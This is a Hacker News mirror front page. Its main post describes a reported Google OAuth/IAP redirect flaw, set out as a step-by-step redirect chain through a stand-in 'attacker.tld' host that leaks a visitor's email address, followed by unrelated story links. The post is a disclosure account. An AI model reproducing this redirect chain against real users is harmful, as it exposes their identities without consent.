frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Open in hackernews

Google Patches WithPersona PII Leak, Then Claims It Was 'Not Reproducible'

1•bbounty_robbed•1h ago
In Feb. I reported this to Google's Bug Bounty team:

1)User visits https://attacker.tld (this can be intentional or via a pop-under)

2) attacker.tld redirects users via status code 302/301 to the oauth endpoints

2.1) redirect 1: https://accounts.google.com/o/oauth2/v2/auth? client_id=[client-id] &response_type=code &scope=openid email &redirect_uri=https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect &code_challenge=[redacted] &code_challenge_method=S256 &cred_ref=true &state=[redacted]

2.2) redirect 2: https://iap.googleapis.com/v1/oauth/clientIds/[client-id]:handleRedirect? state=[redacted] &code=[redacted] &scope=email openid https://www.googleapis.com/auth/userinfo.email &authuser=0 &prompt=none

2.3) redirect 3: https://attacker.tld/ ?gcp-iap-mode=AUTHENTICATING &redirect_token_v2=[redacted]

3) The user's email address is served directly in the HTTP 401 response as a result of 2.3, on the attacker.tld domain name. From this we know that the user's email address has been shared without consent.

Not having received a response, I assumed it was pending. Weeks later I went back to their portal to double check. They had responded, but only within their portal. The ticket went back and forth, claiming that it wasn't reproducible. Finally, I provided them with the live URL at https://withpersona-gov.com.

Once again they argued that the bug wasn't reproducible. Conveniently, the site had changed to redirect to the main withpersona domain, just 2 days after I provided them with the URL.

Obviously this would have been or still is a massive violation of privacy laws. I feel that I've been gaslit here.

Hire based on the conversation about code, not the code itself

https://dbarabashh.com/thoughts-and-experience/hire-for-the-conversation-not-the-code
1•birdculture•5m ago•0 comments

LogAct: Enabling agentic reliability via shared logs

https://arxiv.org/abs/2604.07988
1•pramodbiligiri•12m ago•0 comments

Show HN: A faithful offline recreation of the classic MS-DOS Editor

https://pascar.run
1•mysticmode•30m ago•0 comments

Managing the Unmanaged Switch

https://watchmysys.com/blog/2026/03/managing-the-unmanaged-switch/
1•luu•31m ago•0 comments

Show HN: I fixed sleep schedule by tracking solar time, so I built an app for it

https://sun.mikolajmocek.com/
1•mondonno•33m ago•0 comments

Richard Sutton – Father of RL thinks LLMs are a dead end [video]

https://www.youtube.com/watch?v=21EYKqUsPfg
2•mpweiher•33m ago•1 comments

Scaling Camera File Processing at Netflix

https://netflixtechblog.com/scaling-camera-file-processing-at-netflix-6dab2b1e80be
2•redblueflame•37m ago•0 comments

Show HN: Agent MCP Studio – build multi-agent MCP systems in a browser tab

https://www.agentmcp.studio
3•stealthtsdb•37m ago•0 comments

Testing GPT-5.5 in early access: what we are seeing so far

https://lovable.dev/blog/gpt-5-5-now-in-lovable
2•doener•42m ago•1 comments

Escrow Security for iCloud Keychain

https://support.apple.com/guide/security/escrow-security-for-icloud-keychain-sec3e341e75d/web
2•gurjeet•47m ago•0 comments

Tewart Brand on LSD, A.I. Black Boxes and the Beauty of Care [video]

https://www.youtube.com/watch?v=t8u24wvHeSE
1•born-jre•50m ago•0 comments

Code review advice for vibe coders

https://xata.io/blog/code-review-for-vibe-coders
2•tee-es-gee•54m ago•0 comments

Show HN: A CLI to use any model in your coding agent

https://getaivo.dev/
2•spirit23•59m ago•0 comments

What is Nostr? A simple guide to the protocol

https://usenostr.org/
1•vlugorilla•1h ago•0 comments

The Tiny Donut That Proved We Still Don't Understand Magnetism [video]

https://www.youtube.com/watch?v=XKSjCOKDtpk
1•mpweiher•1h ago•0 comments

List of personal sites that host Wander console, a tool to explore the small web

https://susam.codeberg.page/wander/wcn.html
2•susam•1h ago•0 comments

Naming Things Is Easy Now

https://notesbylex.com/naming-things-is-easy-now
3•lexandstuff•1h ago•0 comments

I left Vercel Pro ($20/mo) for a $10/mo VPS. 7-day Next.js migration report

https://gist.github.com/Samarth0211/b728534af45242b61b45a87a4ecdf155
1•samarth0211•1h ago•1 comments

Global Energy Flows

https://ig.ft.com/global-energy-flows/
1•saswatms•1h ago•0 comments

Mystery Cpuid Bit

http://www.os2museum.com/wp/mystery-cpuid-bit/
1•userbinator•1h ago•0 comments

Do you ever ask "Please Claude I need this my account is kinda tokenless "

https://engram-three.vercel.app/
1•-Refraction-•1h ago•1 comments

Ask HN: What should a Microblogging Site look like?

1•PiSquareS•1h ago•1 comments

ChatGPT Recommends the Same 3 Companies to Every B2B Buyer. Until They Specify

https://growtika.com/blog/chatgpt-b2b-persona-recommendations
2•Growtika•1h ago•1 comments

Ubuntu 26.04 LTS (Resolute Raccoon)

https://releases.ubuntu.com/resolute/
2•kwar13•1h ago•1 comments

Show HN: Aliasme – A shell script to memorize your commands

https://github.com/Jintin/aliasme
1•Jintin•1h ago•2 comments

PasswordStore + GnuPG + TouchID

https://gurjeet.singh.im/blog/passwordstore+gnupg+touchid
2•gurjeet•1h ago•0 comments

SoftHSM

https://github.com/softhsm
1•gurjeet•1h ago•0 comments

Show HN: Aromatic – store-and-forward telemetry for unattended devices over Tor

https://github.com/DO-SAY-GO/aromatic
1•keepamovin•1h ago•0 comments

New 10 GbE USB adapters are cooler, smaller, cheaper

https://www.jeffgeerling.com/blog/2026/new-10-gbe-usb-adapters-cooler-smaller-cheaper/
47•calcifer•1h ago•9 comments

Google Patches WithPersona PII Leak, Then Claims It Was 'Not Reproducible'

1•bbounty_robbed•1h ago•0 comments